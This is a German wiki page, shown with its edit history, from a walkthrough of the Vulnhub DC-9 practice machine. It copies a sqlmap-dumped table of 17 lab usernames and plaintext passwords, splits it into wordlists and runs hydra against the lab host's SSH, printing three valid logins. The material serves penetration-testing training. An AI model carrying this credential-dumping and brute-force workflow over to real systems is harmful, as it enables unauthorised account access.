Vulnhub dc-9 User und Passwörter testen: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
(Die Seite wurde neu angelegt: „=Die Tabelle= <pre> Database: users Table: UserDetails [17 entries] +----+------------+---------------+---------------------+-----------+-----------+ | id | la…“) |
|||
| (6 dazwischenliegende Versionen desselben Benutzers werden nicht angezeigt) | |||
| Zeile 1: | Zeile 1: | ||
=Die Tabelle= | =Die Tabelle= | ||
| + | *wir holen uns die Tablelle ins Arbeitsverzeichniss | ||
| + | *'''cp .local/share/sqlmap/output/10.0.10.58/dump/users/UserDetails.csv .''' | ||
| + | *cat UserDetails.csv | ||
<pre> | <pre> | ||
| − | + | id,lastname,password,reg_date,username,firstname | |
| − | + | 1,Moe,3kfs86sfd,2019-12-29 16:58:26,marym,Mary | |
| − | + | 2,Dooley,468sfdfsd2,2019-12-29 16:58:26,julied,Julie | |
| − | + | 3,Flintstone,4sfd87sfd1,2019-12-29 16:58:26,fredf,Fred | |
| − | + | 4,Rubble,RocksOff,2019-12-29 16:58:26,barneyr,Barney | |
| − | + | 5,Cat,TC&TheBoyz,2019-12-29 16:58:26,tomc,Tom | |
| − | + | 6,Mouse,B8m#48sd,2019-12-29 16:58:26,jerrym,Jerry | |
| − | + | 7,Flintstone,Pebbles,2019-12-29 16:58:26,wilmaf,Wilma | |
| − | + | 8,Rubble,BamBam01,2019-12-29 16:58:26,bettyr,Betty | |
| − | + | 9,Bing,UrAG0D!,2019-12-29 16:58:26,chandlerb,Chandler | |
| − | + | 10,Tribbiani,Passw0rd,2019-12-29 16:58:26,joeyt,Joey | |
| − | + | 11,Green,yN72#dsd,2019-12-29 16:58:26,rachelg,Rachel | |
| − | + | 12,Geller,ILoveRachel,2019-12-29 16:58:26,rossg,Ross | |
| − | + | 13,Geller,3248dsds7s,2019-12-29 16:58:26,monicag,Monica | |
| − | + | 14,Buffay,smellycats,2019-12-29 16:58:26,phoebeb,Phoebe | |
| − | + | 15,McScoots,YR3BVxxxw87,2019-12-29 16:58:26,scoots,Scooter | |
| − | + | 16,Trump,Ilovepeepee,2019-12-29 16:58:26,janitor,Donald | |
| − | + | 17,Morrison,Hawaii-Five-0,2019-12-29 16:58:28,janitor2,Scott | |
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
</pre> | </pre> | ||
| + | =Wir generieren 2 Dateien= | ||
| + | *'''cut -d , -f 5 < UserDetails.csv > users.txt''' | ||
| + | *'''cut -d , -f 3 < UserDetails.csv > pass.txt''' | ||
| + | *'''hydra -L users.txt -P pass.txt 10.0.10.58 ssh''' | ||
| + | Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore | ||
| + | laws and ethics anyway). | ||
| + | |||
| + | Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-09 11:06:56 | ||
| + | [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 | ||
| + | [DATA] max 16 tasks per 1 server, overall 16 tasks, 361 login tries (l:19/p:19), ~23 tries per task | ||
| + | [DATA] attacking ssh://10.0.10.58:22/ | ||
| + | [22][ssh] host: 10.0.10.58 login: '''chandlerb password: UrAG0D!''' | ||
| + | [22][ssh] host: 10.0.10.58 login: '''joeyt password: Passw0rd''' | ||
| + | [STATUS] 259.00 tries/min, 259 tries in 00:01h, 106 to do in 00:01h, 12 active | ||
| + | [22][ssh] host: 10.0.10.58 login: '''janitor password: Ilovepeepee''' | ||
| + | 1 of 1 target successfully completed, 3 valid passwords found | ||
| + | [WARNING] Writing restore file because 2 final worker threads did not complete until end. | ||
| + | [ERROR] 2 targets did not resolve or could not be connected | ||
| + | [ERROR] 0 target did not complete | ||
| + | Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-09 11:08:22 | ||
Aktuelle Version vom 9. März 2023, 10:23 Uhr
Die Tabelle
- wir holen uns die Tablelle ins Arbeitsverzeichniss
- cp .local/share/sqlmap/output/10.0.10.58/dump/users/UserDetails.csv .
- cat UserDetails.csv
id,lastname,password,reg_date,username,firstname 1,Moe,3kfs86sfd,2019-12-29 16:58:26,marym,Mary 2,Dooley,468sfdfsd2,2019-12-29 16:58:26,julied,Julie 3,Flintstone,4sfd87sfd1,2019-12-29 16:58:26,fredf,Fred 4,Rubble,RocksOff,2019-12-29 16:58:26,barneyr,Barney 5,Cat,TC&TheBoyz,2019-12-29 16:58:26,tomc,Tom 6,Mouse,B8m#48sd,2019-12-29 16:58:26,jerrym,Jerry 7,Flintstone,Pebbles,2019-12-29 16:58:26,wilmaf,Wilma 8,Rubble,BamBam01,2019-12-29 16:58:26,bettyr,Betty 9,Bing,UrAG0D!,2019-12-29 16:58:26,chandlerb,Chandler 10,Tribbiani,Passw0rd,2019-12-29 16:58:26,joeyt,Joey 11,Green,yN72#dsd,2019-12-29 16:58:26,rachelg,Rachel 12,Geller,ILoveRachel,2019-12-29 16:58:26,rossg,Ross 13,Geller,3248dsds7s,2019-12-29 16:58:26,monicag,Monica 14,Buffay,smellycats,2019-12-29 16:58:26,phoebeb,Phoebe 15,McScoots,YR3BVxxxw87,2019-12-29 16:58:26,scoots,Scooter 16,Trump,Ilovepeepee,2019-12-29 16:58:26,janitor,Donald 17,Morrison,Hawaii-Five-0,2019-12-29 16:58:28,janitor2,Scott
Wir generieren 2 Dateien
- cut -d , -f 5 < UserDetails.csv > users.txt
- cut -d , -f 3 < UserDetails.csv > pass.txt
- hydra -L users.txt -P pass.txt 10.0.10.58 ssh
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-09 11:06:56 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 361 login tries (l:19/p:19), ~23 tries per task [DATA] attacking ssh://10.0.10.58:22/ [22][ssh] host: 10.0.10.58 login: chandlerb password: UrAG0D! [22][ssh] host: 10.0.10.58 login: joeyt password: Passw0rd [STATUS] 259.00 tries/min, 259 tries in 00:01h, 106 to do in 00:01h, 12 active [22][ssh] host: 10.0.10.58 login: janitor password: Ilovepeepee 1 of 1 target successfully completed, 3 valid passwords found [WARNING] Writing restore file because 2 final worker threads did not complete until end. [ERROR] 2 targets did not resolve or could not be connected [ERROR] 0 target did not complete Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-09 11:08:22